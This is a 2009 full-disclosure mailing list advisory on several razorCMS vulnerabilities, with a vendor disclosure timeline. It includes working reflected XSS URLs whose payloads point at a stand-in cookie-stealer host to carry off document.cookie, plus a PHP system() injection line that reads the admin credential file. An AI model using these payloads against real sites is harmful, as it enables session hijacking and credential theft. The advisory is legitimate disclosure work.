[<prev] [next>] [day] [month] [year] [list]
Message-Id: <20090416091324.417D3118040@smtp.hushmail.com>
Date: Thu, 16 Apr 2009 02:13:23 -0700
From: "Jeremi Gosney" <epixoip@...h.com>
To: full-disclosure@...ts.grok.org.uk
Subject: razorCMS - Multiple Vulnerabilities
-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1
Multiple Vulnerability Disclosure for razorCMS
- ----------------------------------------------
A recent security audit has uncovered multiple security
vulnerabilities in the latest version (0.3RC2) and all previous
versions of razorCMS CORE by Morgan Integrated Systems. From the
vendor site: "razorCMS is an open source content management system
written in PHP, using a flat file database structure instead of
having a separate database. It has been released under the GNU
General Public License." http://razorcms.co.uk,
http://en.wikipedia.org/wiki/RazorCMS
* The razorCMS install script sets mode 0644 on
admin/core/admin_config.php, which contains the site owner's
cleartext FTP credentials and a sha1sum hash of the site admin
password. Any local user has access to these credentials, and the
admin password can easily be cracked offline (rainbow tables, brute
force, etc). The vendor is planning for the use of stronger file
permissions, two-way encryption for FTP credentials, and stronger
salted hashes for admin passwords in the next release (version 0.4).
* razorCMS requires a laundry list of files to be mode 0777 for
installation, and promises to correct these permissions after
installation. The razorCMS install script leaves the following
directories in mode 0777 after installation: the razorCMS root
directory, the datastore/ directory, and the admin/core/ directory.
The issue with this should be readily apparent to you. The vendor
is considering fixing the installer in the next release.
* The razorCMS Security Manager is "used to ensure apache owned
files have safe permissions set." In theory, if the Security
Manager detects any insecure files, it will display a warning
message and instructs the user to click a button to "secure" the
site. By the same token, if all files are found to be secure, the
Security Manager will display "All files are currently safe." The
problem is the Security Manager doesn't actually *do* anything --
it only checks the file permissions of a handful of files, and not
even all of the Apache-owned files like it states. If a user were
to recursively chmod the razorCMS installation to 0777 (which may
be tempting for a novice user to do due to the large number of
files the installer requires to be mode 0777) and then rely on the
Security Manager to secure the site, nearly all files and
directories would be left in mode 0777 and the Security Manager
would report "All files are currently safe." The vendor does not
feel that this tool is broken, just that the phrase "All files" is
misleading and the wording should be changed. I have been
unsuccessful in convincing the vendor that the Security Manager
should *actually* secure the site, so don't expect this to be
fixed. Ever.
* Several cross-site scripting vulnerabilities have been
discovered in the razorCMS admin section, and will be fixed for the
next release:
http://yoursite.com/cms/admin/?action=edit&slab=home'><script>alert(
'http://yourcookiestealer.org/evil.php?cookie='%20+%20encodeURI(docu
ment.cookie)%20+%20'&useragent='%20+%20encodeURI(navigator.userAgent
));</script><form
http://yoursite.com/cms/admin/?action=showcats&unpub=true&slabID=1&c
atname=sidebar'><script>alert('http://yourcookiestealer.org/evil.php
?cookie='%20+%20encodeURI(document.cookie)%20+%20'&useragent='%20+%2
0encodeURI(navigator.userAgent));</script><form
http://yoursite.com/cms/admin/?action=reordercat&cat=sidebar'><scrip
t>alert('http://yourcookiestealer.org/evil.php?cookie='%20+%20encode
URI(document.cookie)%20+%20'&useragent='%20+%20encodeURI(navigator.u
serAgent));</script><form¶m=0,1
* razorCMS has the ability to save content as .php files
(behaviour enabled by default, may be changed in the 'Settings'
area to html). This allows arbitrary PHP code to be injected into
any page, enabling the owner to run commands on the server with the
privileges of the web server. This may also be exploited remotely
through a cross-site request forgery attack: for example, in an
effort to steal user credentials, an authenticated admin may be
tricked into submitting a malicious form that creates a page on
their site containing something like <?php system("cat
../../admin/core/admin_config.php"); ?>. The vendor has no plans to
change this behaviour.
Timeline:
04.06.2009 - Initial vendor notification.
04.07.2009 - Vendor dispustes vulnerabilities.
04.07.2009 - Vulnerabilities explained.
04.07.2009 - Vendor begins to implement certain fixes, refuses to
fix others.
04.07.2009 - Vulnerabilities explained again.
04.07.2009 - Vendor continues to dispute some vulnerabilities.
04.15.2009 - Vendor notified for last time.
04.16.2009 - Public Disclosure.
-----BEGIN PGP SIGNATURE-----
Charset: UTF8
Note: This signature can be verified at https://www.hushtools.com/verify
Version: Hush 3.0
wpwEAQMCAAYFAknm9rQACgkQacHgESW3wZrSCQP/et6hdKAGKlYcwQ8y9zx/62knIlBm
w6cUDqxh1p2CSGhu81Uep9Rgx1DEftJ+ltGl/Nfe7iwuQNB+O0Ro42w5YLKyfpn11KeP
2aEChWUnZluavMHHKpSjeIYGWrQR1b6lUfWnULheuehZH/T3xvf3yy9DPScjAEQvI1hz
hXU6ua4=
=anJq
-----END PGP SIGNATURE-----
_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/
Powered by blists - more mailing lists